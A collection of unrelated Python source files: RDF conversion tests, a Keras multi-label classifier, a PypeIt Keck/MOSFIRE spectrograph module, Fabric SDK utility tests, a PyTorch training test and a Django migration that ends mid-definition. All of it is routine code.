self.snmptrap = [snmptrap() for _ in range(length)]
|
import json
import unittest
from pathlib import Path
from sparcur import apinat
import pytest
export = False
debug = False
class TestApiNATToRDF(unittest.TestCase):
def test_1(self):
with open((Path(__file__).parent / 'apinatomy/data/test_1_map.json'), 'rt') as f:
m = json.load(f)
with open((Path(__file__).parent / 'apinatomy/data/test_1_generated.json'), 'rt') as f:
g = json.load(f)
apin = apinat.Graph(m, g)
rdfg = apin.graph()
rtmap = apinat.Graph.fromRdf(rdfg).map
assert list(rdfg)
assert rtmap['resources']
if export:
rdfg.write(Path('test-1.ttl'))
if debug:
print(rdfg.ttl)
print(rtmap)
assert False
def test_2(self):
with open((Path(__file__).parent / 'apinatomy/data/test_2_map.json'), 'rt') as f:
m = json.load(f)
with open((Path(__file__).parent / 'apinatomy/data/test_2_generated.json'), 'rt') as f:
g = json.load(f)
apin = apinat.Graph(m, g)
rdfg = apin.graph()
rtmap = apinat.Graph.fromRdf(rdfg).map
assert list(rdfg)
assert rtmap['resources']
if export:
rdfg.write(Path('test-2.ttl'))
if debug:
print(rdfg.ttl)
print(rtmap)
assert False
def test_3(self):
with open((Path(__file__).parent / 'apinatomy/data/test_3_map.json'), 'rt') as f:
m = json.load(f)
with open((Path(__file__).parent / 'apinatomy/data/test_3_generated.json'), 'rt') as f:
g = json.load(f)
apin = apinat.Graph(m, g)
rdfg = apin.graph()
rtmap = apinat.Graph.fromRdf(rdfg).map
assert list(rdfg)
assert rtmap['resources']
if export:
rdfg.write(Path('test-3.ttl'))
if debug:
print(rdfg.ttl)
print(rtmap)
assert False
def test_4(self):
with open((Path(__file__).parent / 'apinatomy/data/test_4_map.json'), 'rt') as f:
m = json.load(f)
with open((Path(__file__).parent / 'apinatomy/data/test_4_generated.json'), 'rt') as f:
g = json.load(f)
apin = apinat.Graph(m, g)
rdfg = apin.graph()
rtmap = apinat.Graph.fromRdf(rdfg).map
assert list(rdfg)
assert rtmap['resources']
if export:
rdfg.write(Path('test-4.ttl'))
if debug:
print(rdfg.ttl)
print(rtmap)
assert False
def test_5(self):
with open((Path(__file__).parent / 'apinatomy/data/test_5_map.json'), 'rt') as f:
m = json.load(f)
# FIXME generated is broken at the moment
with open((Path(__file__).parent / 'apinatomy/data/test_5_model.json'), 'rt') as f:
g = json.load(f)
apin = apinat.Graph(m, g)
rdfg = apin.graph()
rtmap = apinat.Graph.fromRdf(rdfg).map
assert list(rdfg)
assert rtmap['resources']
if export:
rdfg.write(Path('test-5.ttl'))
if debug:
print(rdfg.ttl)
print(rtmap)
assert False
<EMAIL>('not ready')
def test_bolew(self):
with open((Path(__file__).parent / 'apinatomy/data/bolser-lewis-map.json'), 'rt') as f:
m = json.load(f)
#m = {'id':'null', 'resources':{}}
with open((Path(__file__).parent / 'apinatomy/data/bolser-lewis-generated.json'), 'rt') as f:
g = json.load(f)
apin = apinat.Graph(m, g)
rdfg = apin.graph()
rtmap = apinat.Graph.fromRdf(rdfg).map
if export:
rdfg.write(Path('test-bolew.ttl'))
if debug:
print(rdfg.ttl)
print(rtmap)
assert False
class TestRDFToOWL2(unittest.TestCase):
pass
|
<filename>multi_label/multi_label_model.py
# -*- coding: utf-8 -*-
"""
File multi_label_model.py
@author:ZhengYuwei
"""
import logging
from tensorflow import keras
from backbone.resnet18 import ResNet18
from backbone.resnet18_v2 import ResNet18_v2
from backbone.resnext import ResNeXt18
from backbone.mixnet18 import MixNet18
from backbone.mobilenet_v2 import MobileNetV2
class Classifier(object):
"""
分类器,自定义了多标签的head(多输出keras.models.Model对象)
"""
BACKBONE_RESNET_18 = 'resnet-18'
BACKBONE_RESNET_18_V2 = 'resnet-18-v2'
BACKBONE_RESNEXT_18 = 'resnext-18'
BACKBONE_MIXNET_18 = 'mixnet-18'
BACKBONE_MOBILENET_V2 = 'mobilenet-v2'
BACKBONE_TYPE = {
BACKBONE_RESNET_18: ResNet18,
BACKBONE_RESNET_18_V2: ResNet18_v2,
BACKBONE_RESNEXT_18: ResNeXt18,
BACKBONE_MOBILENET_V2: MobileNetV2,
BACKBONE_MIXNET_18: MixNet18
}
@classmethod
def _multi_label_head(cls, net, output_shape, output_names):
"""
多标签分类器的head,上接全连接输入,下输出多个标签的多分类softmax输出
:param net: 全连接输入
:param output_shape: 多标签输出的每个分支的类别数列表
:param output_names: 多标签输出的每个分支的名字
:return: keras.models.Model对象
"""
# 全连接层:先做全局平均池化,然后flatten,然后再全连接层
net = keras.layers.GlobalAveragePooling2D()(net)
net = keras.layers.Flatten()(net)
# 不同标签分支
outputs = list()
for num, name in zip(output_shape, output_names):
output = keras.layers.Dense(units=num, kernel_initializer=keras.initializers.RandomNormal(stddev=0.01),
activation="softmax", name=name)(net)
"""
output = keras.layers.Dense(units=num, kernel_initializer=keras.initializers.RandomNormal(stddev=0.01),
kernel_regularizer=keras.regularizers.l2(ResNet18.L2_WEIGHT),
bias_regularizer=keras.regularizers.l2(ResNet18.L2_WEIGHT),
activation="softmax", name=name)(net)
"""
outputs.append(output)
return outputs
@classmethod
def build(cls, backbone, input_shape, output_shape, output_names):
"""
构建backbone基础网络的多标签分类keras.models.Model对象
:param backbone: 基础网络,枚举变量 Classifier.NetType
:param input_shape: 输入尺寸
:param output_shape: 多标签输出的每个分支的类别数列表
:param output_names: 多标签输出的每个分支的名字
:return: resnet18基础网络的多标签分类keras.models.Model对象
"""
if len(input_shape) != 3:
raise Exception('模型输入形状必须是3维形式')
if backbone in cls.BACKBONE_TYPE.keys():
backbone = cls.BACKBONE_TYPE[backbone]
else:
raise ValueError("没有该类型的基础网络!")
if len(input_shape) != 3:
raise Exception('模型输入形状必须是3维形式')
logging.info('构造多标签分类模型,基础网络:%s', backbone)
input_x = keras.layers.Input(shape=input_shape)
backbone_model = backbone.build(input_x)
outputs = Classifier._multi_label_head(backbone_model, output_shape, output_names)
model = keras.models.Model(inputs=input_x, outputs=outputs, name=backbone)
return model
if __name__ == '__main__':
"""
可视化网络结构,使用plot_model需要先用conda安装GraphViz、pydotplus
"""
from configs import FLAGS
model_names = Classifier.BACKBONE_TYPE.keys()
for model_name in model_names:
test_model = Classifier.build(model_name, FLAGS.input_shape, FLAGS.output_shapes, FLAGS.output_names)
keras.utils.plot_model(test_model, to_file='../images/{}.svg'.format(model_name), show_shapes=True)
test_model.summary()
|
<gh_stars>0
"""
Module for Keck/MOSFIRE specific methods.
.. include:: ../include/links.rst
"""
import os
from pkg_resources import resource_filename
from IPython import embed
import numpy as np
from astropy.io import fits
from astropy.stats import sigma_clipped_stats
from pypeit import msgs
from pypeit import telescopes
from pypeit.core import framematch
from pypeit import utils
from pypeit.spectrographs import spectrograph
from pypeit.images import detector_container
from scipy import special
class KeckMOSFIRESpectrograph(spectrograph.Spectrograph):
"""
Child to handle Keck/MOSFIRE specific code
"""
ndet = 1
name = 'keck_mosfire'
telescope = telescopes.KeckTelescopePar()
camera = 'MOSFIRE'
supported = True
comment = 'Gratings tested: Y, J, K'
def get_detector_par(self, hdu, det):
"""
Return metadata for the selected detector.
Args:
hdu (`astropy.io.fits.HDUList`_):
The open fits file with the raw image of interest.
det (:obj:`int`):
1-indexed detector number.
Returns:
:class:`~pypeit.images.detector_container.DetectorContainer`:
Object with the detector metadata.
"""
# Detector 1
detector_dict = dict(
binning = '1,1',
det = 1,
dataext = 0,
specaxis = 1,
specflip = False,
spatflip = False,
platescale = 0.1798,
darkcurr = 0.8,
saturation = 1e9, # ADU, this is hacked for now
nonlinear = 1.00, # docs say linear to 90,000 but our flats are usually higher
numamplifiers = 1,
mincounts = -1e10,
gain = np.atleast_1d(2.15), # Taken from MOSFIRE detector webpage
ronoise = np.atleast_1d(5.8), # This is for 16 non-destructuve reads, the default readout mode
datasec = np.atleast_1d('[5:2044,5:2044]'),
#oscansec = np.atleast_1d('[:,:]')
)
return detector_container.DetectorContainer(**detector_dict)
@classmethod
def default_pypeit_par(cls):
"""
Return the default parameters to use for this instrument.
Returns:
:class:`~pypeit.par.pypeitpar.PypeItPar`: Parameters required by
all of ``PypeIt`` methods.
"""
par = super().default_pypeit_par()
# Wavelengths
# 1D wavelength solution
par['calibrations']['wavelengths']['rms_threshold'] = 0.30 #0.20 # Might be grating dependent..
par['calibrations']['wavelengths']['sigdetect']=5.0
par['calibrations']['wavelengths']['fwhm']= 5.0
par['calibrations']['wavelengths']['n_final']= 4
par['calibrations']['wavelengths']['lamps'] = ['OH_NIRES']
#par['calibrations']['wavelengths']['nonlinear_counts'] = self.detector[0]['nonlinear'] * self.detector[0]['saturation']
par['calibrations']['wavelengths']['method'] = 'holy-grail'
# Reidentification parameters
#par['calibrations']['wavelengths']['reid_arxiv'] = 'keck_nires.fits'
par['calibrations']['slitedges']['edge_thresh'] = 50.
par['calibrations']['slitedges']['sync_predict'] = 'nearest'
# Flats
# Do not illumination correct. We should also not be flat fielding given the bars.
# TODO Implement imaging flats for MOSFIRE. Do test with/without illumination flats.
# Turn of illumflat
turn_off = dict(use_biasimage=False, use_overscan=False, use_darkimage=False)
par.reset_all_processimages_par(**turn_off)
# Extraction
par['reduce']['skysub']['bspline_spacing'] = 0.8
par['reduce']['extraction']['sn_gauss'] = 4.0
# Flexure
par['flexure']['spec_method'] = 'skip'
par['scienceframe']['process']['sigclip'] = 20.0
par['scienceframe']['process']['satpix'] ='nothing'
# Set the default exposure time ranges for the frame typing
par['calibrations']['standardframe']['exprng'] = [None, 20]
par['calibrations']['arcframe']['exprng'] = [20, None]
par['calibrations']['darkframe']['exprng'] = [20, None]
par['scienceframe']['exprng'] = [20, None]
# Sensitivity function parameters
par['sensfunc']['extrap_blu'] = 0.0 # Y-band contaminated by higher order so don't extrap much
par['sensfunc']['extrap_red'] = 0.0
par['fluxcalib']['extrap_sens'] = True
par['sensfunc']['extrap_red'] = 0.0
par['sensfunc']['algorithm'] = 'IR'
par['sensfunc']['polyorder'] = 13
par['sensfunc']['IR']['maxiter'] = 2
par['sensfunc']['IR']['telgridfile'] \
= os.path.join(par['sensfunc']['IR'].default_root,
'TelFit_MaunaKea_3100_26100_R20000.fits')
return par
def init_meta(self):
"""
Define how metadata are derived from the spectrograph files.
That is, this associates the ``PypeIt``-specific metadata keywords
with the instrument-specific header cards using :attr:`meta`.
"""
self.meta = {}
# Required (core)
self.meta['ra'] = dict(ext=0, card='RA')
self.meta['dec'] = dict(ext=0, card='DEC')
self.meta['target'] = dict(ext=0, card='TARGNAME')
self.meta['decker'] = dict(ext=0, card='MASKNAME')
self.meta['binning'] = dict(ext=0, card=None, default='1,1')
self.meta['mjd'] = dict(ext=0, card='MJD-OBS')
self.meta['exptime'] = dict(ext=0, card='TRUITIME')
self.meta['airmass'] = dict(ext=0, card='AIRMASS')
# Extras for config and frametyping
self.meta['dispname'] = dict(ext=0, card='OBSMODE')
self.meta['idname'] = dict(card=None, compound=True)
# Filter
self.meta['filter1'] = dict(ext=0, card='FILTER')
# Lamps
lamp_names = ['FLATSPEC']
for kk,lamp_name in enumerate(lamp_names):
self.meta['lampstat{:02d}'.format(kk+1)] = dict(ext=0, card=lamp_name)
# Dithering
self.meta['dithpat'] = dict(ext=0, card='PATTERN')
self.meta['dithpos'] = dict(ext=0, card='FRAMEID')
self.meta['dithoff'] = dict(ext=0, card='YOFFSET')
def compound_meta(self, headarr, meta_key):
"""
Methods to generate metadata requiring interpretation of the header
data, instead of simply reading the value of a header card.
Args:
headarr (:obj:`list`):
List of `astropy.io.fits.Header`_ objects.
meta_key (:obj:`str`):
Metadata keyword to construct.
Returns:
object: Metadata value read from the header(s).
"""
if meta_key == 'idname':
if headarr[0].get('KOAIMTYP', None) is not None:
return headarr[0].get('KOAIMTYP')
else:
try:
# TODO: This should be changed to except on a specific error.
FLATSPEC = int(headarr[0].get('FLATSPEC'))
PWSTATA7 = int(headarr[0].get('PWSTATA7'))
PWSTATA8 = int(headarr[0].get('PWSTATA8'))
if FLATSPEC == 0 and PWSTATA7 == 0 and PWSTATA8 == 0:
return 'object'
elif FLATSPEC == 1:
return 'flatlamp'
elif PWSTATA7 == 1 or PWSTATA8 == 1:
return 'arclamp'
except:
return 'unknown'
else:
msgs.error("Not ready for this compound meta")
def configuration_keys(self):
"""
Return the metadata keys that define a unique instrument
configuration.
This list is used by :class:`~pypeit.metadata.PypeItMetaData` to
identify the unique configurations among the list of frames read
for a given reduction.
Returns:
:obj:`list`: List of keywords of data pulled from file headers
and used to constuct the :class:`~pypeit.metadata.PypeItMetaData`
object.
"""
return ['decker', 'dispname', 'filter1']
def pypeit_file_keys(self):
"""
Define the list of keys to be output into a standard ``PypeIt`` file.
Returns:
:obj:`list`: The list of keywords in the relevant
:class:`~pypeit.metadata.PypeItMetaData` instance to print to the
:ref:`pypeit_file`.
"""
# pypeit_keys = super().pypeit_file_keys()
# # TODO: Why are these added here? See
# # pypeit.metadata.PypeItMetaData.set_pypeit_cols
# pypeit_keys += [calib', 'comb_id', 'bkg_id']
# return pypeit_keys
return super().pypeit_file_keys() + ['dithpat', 'dithpos', 'dithoff']
def check_frame_type(self, ftype, fitstbl, exprng=None):
"""
Check for frames of the provided type.
Args:
ftype (:obj:`str`):
Type of frame to check. Must be a valid frame type; see
frame-type :ref:`frame_type_defs`.
fitstbl (`astropy.table.Table`_):
The table with the metadata for one or more frames to check.
exprng (:obj:`list`, optional):
Range in the allowed exposure time for a frame of type
``ftype``. See
:func:`pypeit.core.framematch.check_frame_exptime`.
Returns:
`numpy.ndarray`_: Boolean array with the flags selecting the
exposures in ``fitstbl`` that are ``ftype`` type frames.
"""
good_exp = framematch.check_frame_exptime(fitstbl['exptime'], exprng)
if ftype in ['science', 'standard']:
return good_exp & (fitstbl['idname'] == 'object')
if ftype in ['bias', 'dark']:
return good_exp & self.lamps(fitstbl, 'off') & (fitstbl['idname'] == 'dark')
if ftype in ['pixelflat', 'trace']:
# Flats and trace frames are typed together
return good_exp & self.lamps(fitstbl, 'dome') & (fitstbl['idname'] == 'flatlamp')
if ftype == 'pinhole':
# Don't type pinhole frames
return np.zeros(len(fitstbl), dtype=bool)
if ftype in ['arc', 'tilt']:
# TODO: This is a kludge. Allow science frames to also be
# classified as arcs
is_arc = self.lamps(fitstbl, 'arcs') & (fitstbl['idname'] == 'arclamp')
is_obj = self.lamps(fitstbl, 'off') & (fitstbl['idname'] == 'object')
return good_exp & (is_arc | is_obj)
msgs.warn('Cannot determine if frames are of type {0}.'.format(ftype))
return np.zeros(len(fitstbl), dtype=bool)
def lamps(self, fitstbl, status):
"""
Check the lamp status.
Args:
fitstbl (`astropy.table.Table`_):
The table with the fits header meta data.
status (:obj:`str`):
The status to check. Can be ``'off'``, ``'arcs'``, or
``'dome'``.
Returns:
`numpy.ndarray`_: A boolean array selecting fits files that meet
the selected lamp status.
Raises:
ValueError:
Raised if the status is not one of the valid options.
"""
if status == 'off':
# Check if all are off
return np.all(np.array([fitstbl[k] == 0 for k in fitstbl.keys() if 'lampstat' in k]),
axis=0)
if status == 'arcs':
# Check if any arc lamps are on
arc_lamp_stat = [ 'lampstat{0:02d}'.format(i) for i in range(1,6) ]
return np.any(np.array([ fitstbl[k] == 1 for k in fitstbl.keys()
if k in arc_lamp_stat]), axis=0)
if status == 'dome':
return fitstbl['lampstat01'] == '1'
raise ValueError('No implementation for status = {0}'.format(status))
def parse_dither_pattern(self, file_list, ext=None):
"""
Parse headers from a file list to determine the dither pattern.
Parameters
----------
file_list (list of strings):
List of files for which dither pattern is desired
ext (int, optional):
Extension containing the relevant header for these files. Default=None. If None, code uses
self.primary_hdrext
Returns
-------
dither_pattern, dither_id, offset_arcsec
dither_pattern (str `numpy.ndarray`_):
Array of dither pattern names
dither_id (str `numpy.ndarray`_):
Array of dither pattern IDs
offset_arc (float `numpy.ndarray`_):
Array of dither pattern offsets
"""
nfiles = len(file_list)
offset_arcsec = np.zeros(nfiles)
dither_pattern = []
dither_id = []
for ifile, file in enumerate(file_list):
hdr = fits.getheader(file, self.primary_hdrext if ext is None else ext)
dither_pattern.append(hdr['PATTERN'])
dither_id.append(hdr['FRAMEID'])
offset_arcsec[ifile] = hdr['YOFFSET']
return np.array(dither_pattern), np.array(dither_id), np.array(offset_arcsec)
def tweak_standard(self, wave_in, counts_in, counts_ivar_in, gpm_in, meta_table, debug=False):
"""
This routine is for performing instrument/disperser specific tweaks to standard stars so that sensitivity
function fits will be well behaved. For example, masking second order light. For instruments that don't
require such tweaks it will just return the inputs, but for isntruments that do this function is overloaded
with a method that performs the tweaks.
Parameters
----------
wave_in: (float np.ndarray) shape = (nspec,)
Input standard star wavelenghts
counts_in: (float np.ndarray) shape = (nspec,)
Input standard star counts
counts_ivar_in: (float np.ndarray) shape = (nspec,)
Input inverse variance of standard star counts
gpm_in: (bool np.ndarray) shape = (nspec,)
Input good pixel mask for standard
meta_table: (astropy.table)
Table containing meta data that is slupred from the specobjs object. See unpack_object routine in specobjs.py
for the contents of this table.
Returns
-------
wave_out: (float np.ndarray) shape = (nspec,)
Output standard star wavelenghts
counts_out: (float np.ndarray) shape = (nspec,)
Output standard star counts
counts_ivar_out: (float np.ndarray) shape = (nspec,)
Output inverse variance of standard star counts
gpm_out: (bool np.ndarray) shape = (nspec,)
Output good pixel mask for standard
"""
# Could check the wavelenghts here to do something more robust to header/meta data issues
if 'Y-spectroscopy' in meta_table['DISPNAME']:
#wave_out = np.copy(wave_in)
#counts_out = np.copy(counts_in)
#counts_ivar_out = np.copy(counts_ivar_in)
#gpm_out = np.copy(gpm_in)
# The blue edge and red edge of the detector are contaiminated by higher order light. These are masked
# by hand.
#second_order_region= (wave_in < 9520.0) | (wave_in > 11256.0)
#gpm_out = gpm_in & np.logical_not(second_order_region)
# Use a sigmoid function to apodize the spectrum smoothly in the regions where it is bad.
#dlam = 10.0 # width that determines how shaprly apodization occurs
#sigmoid_blue_arg = (wave_in - wave_blue)/dlam
#sigmoid_red_arg = (wave_red - wave_in)/dlam
#sigmoid_apodize = special.expit(sigmoid_blue_arg) * special.expit(sigmoid_red_arg)
#counts = counts_in*sigmoid_apodize
# No we apodize only the flux. Since there are more counts in the in the unapodized spectrum, there is also
# more variance in the original counts_ivar_in, and so in this way the S/N ratio is naturally reduced
# in this region. There is not an obvious way to tweak the error vector here, and we don't to just mask
# since then the polynomial fits go crazy at the boundaries. This is a reasonable compromise to not mask the
# counts_ivar_in. The flux is bogus in the regions we are apodizing, so it does not really matter what we do,
# it is better than operating on the original bogus flux.
# Inflat the errors in the apodized region so that they don't inform the fits much
#apo_pix = (sigmoid_apodize < 0.95)
#mean_counts, med_counts, sigma_counts = sigma_clipped_stats(counts_in[np.logical_not(apo_pix)], sigma=3.0)
#sigma_apo = med_counts/20.0 # roughly S/N ratio 20 in the apodized region
#counts_ivar[apo_pix] = 1.0/sigma_apo**2
#sigma_apo = np.sqrt(np.abs(counts[apo_pix]))
#counts_ivar[apo_pix] = utils.inverse(sigma_apo**2)
#counts_ivar[apo_pix] = utils.clip_ivar(counts[apo_pix], counts_ivar_in[apo_pix], 10.0, mask=gpm_in[apo_pix])
wave_blue = 9520.0 # blue wavelength below which there is contamination
wave_red = 11256.0 # red wavelength above which the spectrum is containated
second_order_region= (wave_in < wave_blue) | (wave_in > wave_red)
wave = wave_in.copy()
counts = counts_in.copy()
gpm = gpm_in.copy()
counts_ivar = counts_ivar_in.copy()
# By setting the wavelengths to zero, we guarantee that the sensitvity function will only be computed
# over the valid wavelength region. While we could mask, this would still produce a wave_min and wave_max
# for the zeropoint that includes the bad regions, and the polynomial fits will extrapolate crazily there
wave[second_order_region] = 0.0
counts[second_order_region] = 0.0
counts_ivar[second_order_region] = 0.0
gpm[second_order_region] = False
#if debug:
# from matplotlib import pyplot as plt
# counts_sigma = np.sqrt(utils.inverse(counts_ivar_in))
# plt.plot(wave_in, counts, color='red', alpha=0.7, label='apodized flux')
# plt.plot(wave_in, counts_in, color='black', alpha=0.7, label='flux')
# plt.plot(wave_in, counts_sigma, color='blue', alpha=0.7, label='flux')
# plt.axvline(wave_blue, color='blue')
# plt.axvline(wave_red, color='red')
# plt.legend()
# plt.show()
return wave, counts, counts_ivar, gpm
else:
return wave_in, counts_in, counts_ivar_in, gpm_in
|
# Copyright 2009-2017 SAP SE or an SAP affiliate company.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import unittest
from hfc.fabric.client import Client
from hfc.fabric.transaction.tx_context import TXContext
from hfc.util.crypto.crypto import Ecies
from hfc.util import utils
from test.integration.utils import get_orderer_org_user
from test.integration.config import E2E_CONFIG
from hfc.protos.msp import identities_pb2
from hfc.protos.common import configtx_pb2
from hfc.protos.common import common_pb2
from google.protobuf.timestamp_pb2 import Timestamp
class UtilsTest(unittest.TestCase):
def setUp(self):
self.orderer_org_mspid = \
E2E_CONFIG['test-network']['orderer']['mspid']
self.channel_tx = \
E2E_CONFIG['test-network']['channel-artifacts']['channel.tx']
self.channel_id = \
E2E_CONFIG['test-network']['channel-artifacts']['channel_id']
self.base_path = "/tmp/fabric-sdk-py"
self.kv_store_path = os.path.join(self.base_path, "key-value-store")
def test_create_serialized_identity(self):
client = Client('test/fixtures/network.json')
orderer_org_admin = get_orderer_org_user(state_store=client.state_store
)
orderer_org_admin_serialized = utils.create_serialized_identity(
orderer_org_admin)
serialized_identity = identities_pb2.SerializedIdentity()
serialized_identity.ParseFromString(orderer_org_admin_serialized)
self.assertEqual(serialized_identity.mspid,
self.orderer_org_mspid)
def test_build_channel_header(self):
timestamp = utils.current_timestamp()
proto_channel_header = utils.build_channel_header(
common_pb2.HeaderType.Value('CONFIG_UPDATE'),
'12341234',
self.channel_id,
timestamp
)
self.assertIsInstance(proto_channel_header, common_pb2.ChannelHeader)
self.assertEqual(proto_channel_header.channel_id, self.channel_id)
def test_string_to_signature(self):
with open(self.channel_tx, 'rb') as f:
channel_tx = f.read()
channel_config = utils.extract_channel_config(channel_tx)
client = Client('test/fixtures/network.json')
orderer_org_admin = get_orderer_org_user(state_store=client.state_store
)
orderer_org_admin_tx_context = \
TXContext(orderer_org_admin, Ecies(), {})
client.tx_context = orderer_org_admin_tx_context
orderer_org_admin_signature = client.sign_channel_config(
channel_config
)
proto_signature = utils.string_to_signature(
[orderer_org_admin_signature]
)
self.assertIsInstance(proto_signature, list)
self.assertTrue(
'OrdererMSP' in proto_signature[0].signature_header.__str__())
def test_current_timestamp(self):
my_timestamp = Timestamp()
my_timestamp.GetCurrentTime()
their_timestamp = utils.current_timestamp()
self.assertEqual(my_timestamp.seconds, their_timestamp.seconds)
def test_extract_channel_config(self):
with open(self.channel_tx, 'rb') as f:
channel_tx = f.read()
config_update = configtx_pb2.ConfigUpdate()
channel_config = utils.extract_channel_config(channel_tx)
self.assertTrue(hasattr(channel_config, 'decode'))
config_update.ParseFromString(channel_config)
self.assertEqual(config_update.channel_id, self.channel_id)
def test_build_header(self):
timestamp = utils.current_timestamp()
client = Client('test/fixtures/network.json')
orderer_org_admin = get_orderer_org_user(state_store=client.state_store
)
orderer_org_admin_tx_context = \
TXContext(orderer_org_admin, Ecies(), {})
client.tx_context = orderer_org_admin_tx_context
orderer_org_admin_serialized = utils.create_serialized_identity(
orderer_org_admin)
serialized_identity = identities_pb2.SerializedIdentity()
serialized_identity.ParseFromString(orderer_org_admin_serialized)
proto_channel_header = utils.build_channel_header(
common_pb2.HeaderType.Value('CONFIG_UPDATE'),
orderer_org_admin_tx_context.tx_id,
self.channel_id,
timestamp
)
channel_header = utils.build_header(
orderer_org_admin_tx_context.identity,
proto_channel_header,
orderer_org_admin_tx_context.nonce
)
self.assertIsInstance(channel_header, common_pb2.Header)
if __name__ == '__main__':
unittest.main()
|
<reponame>deep-cube/deep-cube
from model_lcrn import LRCN
from model_seq_cnn import *
from model_conv import ConvPredictor
from tqdm import trange, tqdm
from test_dummy_data_generator import *
from model_trainer import train_model
import torch
import numpy as np
import unittest
import data_def
import metrics
class TestConvTrain(unittest.TestCase):
def _run_single_square_activated(
self,
square_persistence_length,
use_background_noise=False,
num_epochs=5
):
B, L, C, H, W = 50, 30, 3, 30, 30
num_class = 2
conv_module = SequentialCNN3D(
C, H, W,
[
(16, 13, 7, True),
(32, 13, 5, True),
(64, 13, 3, True),
],
use_batchnorm=True
)
hidden_sizes = [300, 100]
model = ConvPredictor(
conv_module,
hidden_sizes,
num_class,
)
print(model)
train_loader = torch.utils.data.DataLoader(
SingleSquareActivatedDataset(
L, C, H, W,
use_background_noise=use_background_noise,
dataset_length=1000,
square_persistence_length=square_persistence_length
),
batch_size=B, num_workers=1,
)
dev_loader = torch.utils.data.DataLoader(
SingleSquareActivatedDataset(
L, C, H, W,
use_background_noise=use_background_noise,
dataset_length=200,
square_persistence_length=square_persistence_length
),
batch_size=B, num_workers=1,
)
def on_batch(i, x, y, scores):
if i % 5 == 0:
print(y.shape)
print(scores.shape)
# yhat_collapsed = data_def.collapse(
# torch.argmax(scores[0], dim=-1).cpu().numpy())
# y_collapsed = data_def.collapse(y[0].cpu().numpy())
# print(yhat_collapsed)
# print(y_collapsed)
print(torch.argmax(scores[0], dim=-1))
print(y[0])
print('edit dist')
print(metrics.sum_edit_distance(scores, y) / len(y))
optimizer = torch.optim.Adam(model.parameters())
results = train_model(
model,
train_dataloader=train_loader,
optimizer=optimizer,
criterion_name='cross_entropy',
dev_dataloader=dev_loader,
test_dataloader=dev_loader,
num_epoch=num_epochs,
on_batch=on_batch,
additional_metrics={
'edit_distance': metrics.sum_edit_distance
}
)
pprint(results)
# assert results['train_acc'][-1] > 0.92
# assert results['dev_acc'][-1] > 0.92
# def test_1_frame_without_noise(self):
# print('test_1_frame_without_noise')
# self._run_single_square_activated(1, num_epochs=5)
# def test_3_frame_without_noise(self):
# print('test_3_frame_without_noise')
# self._run_single_square_activated(3, num_epochs=5)
def test_1_frame_with_noise(self):
print('test_1_frame_with_noise')
self._run_single_square_activated(
3, use_background_noise=True, num_epochs=5)
if __name__ == "__main__":
unittest.main()
|
# Generated by Django 2.0.13 on 2019-10-10 17:52
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('contact', '0016_datahuboutsideentitycontact'),
]
operations = [
migrations.CreateModel(
name='OrderMap',
fields=[
('map_order_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, verbose_name='Map Order ID')),
('map_option', models.CharField(blank=True, choices=[('USGS', 'USGS'), ('NWI', 'NWI'), ('FEMA', 'FEMA')], help_text='For Federal Prints only.', max_length=10, null=True, verbose_name='Map Option')),
('map_description', models.TextField(blank=True, help_text='List all quads/panels and specify quantity for each map. For Federal Prints only.', null=True, verbose_name='Map Description')),
('map_collection_name', models.CharField(blank=True, help_text='For Pre-made Maps only.', max_length=300, null=True, verbose_name='Map Collection Name')),
('map_sheet', models.CharField(blank=True, help_text='For Pre-made Maps only.', max_length=300, null=True, verbose_name='Map Sheet')),
('legislative_request', models.BooleanField(default=False, help_text='For Pre-made Maps only.', verbose_name='Legislative Request?')),
('map_size', models.CharField(blank=True, choices=[('8.5_by_11', '8.5_by_11'), ('11_by_17', '11_by_17'), ('24_by_24', '24_by_24'), ('24_by_28', '24_by_28'), ('30_by_30', '30_by_30'), ('36_by_36', '36_by_36'), ('60_by_60', '60_by_60'), ('custom_xlarge', 'custom_xlarge')], help_text='For Custom Maps only.', max_length=20, null=True, verbose_name='Map Size')),
('custom_map_size', models.CharField(blank=True, help_text='Custom sizes requests are only accepted for sizes greater than 60 x 60. For Custom Maps only.', max_length=100, null=True, verbose_name='Custom Map Size')),
('map_scale', models.CharField(blank=True, help_text='For Custom Maps only.', max_length=100, null=True, verbose_name='Map Scale')),
('map_title', models.CharField(blank=True, help_text='For Custom Maps only.', max_length=200, null=True, verbose_name='Map Title')),
('map_date', models.CharField(blank=True, help_text='For Custom Maps only.', max_length=100, null=True, verbose_name='Map Date')),
('type_of_data', models.CharField(blank=True, choices=[('N/A', 'N/A'), ('Maps', 'Maps')], default='Maps', max_length=25, null=True, verbose_name='Type of Data')),
('type_of_map', models.CharField(blank=True, choices=[('Federal Print', 'Federal Print'), ('Pre-Made Print', 'Pre-Made Print'), ('Custom', 'Custom')], max_length=20, null=True, verbose_name='Type of Map')),
('additional_info', models.TextField(blank=True, null=True, verbose_name='Additional Info')),
('name', models.CharField(blank=True, max_length=150, null=True, verbose_name='Name')),
('organization', models.CharField(blank=True, max_length=100, null=True, verbose_name='Organization')),
('industry', models.CharField(blank=True, max_length=50, null=True, verbose_name='Industry')),
('industry_other', models.CharField(blank=True, max_length=50, null=True, verbose_name='Industry (Other)')),
('address_1', models.CharField(blank=True, max_length=150, null=True, verbose_name='Address 1')),
('address_2', models.CharField(blank=True, max_length=150, null=True, verbose_name='Address 2')),
('city', models.CharField(blank=True, max_length=75, null=True, verbose_name='City')),
('state', models.CharField(blank=True, max_length=50, null=True, verbose_name='State')),
('zip', models.CharField(blank=True, max_length=15, null=True, verbose_name='Zip')),
('email', models.CharField(blank=True, max_length=150, null=True, verbose_name='Email')),
('phone', models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone')),
('fax', models.CharField(blank=True, max_length=20, null=True, verbose_name='Fax')),
('delivery_method', models.CharField(blank=True, choices=[('Digital Download', 'Digital Download'), ('USPS', 'USPS'), ('FedEx', 'FedEx'), ('FedEx Customer Charged', 'FedEx Customer Charged')], max_length=30, null=True, verbose_name='Delivery Method')),
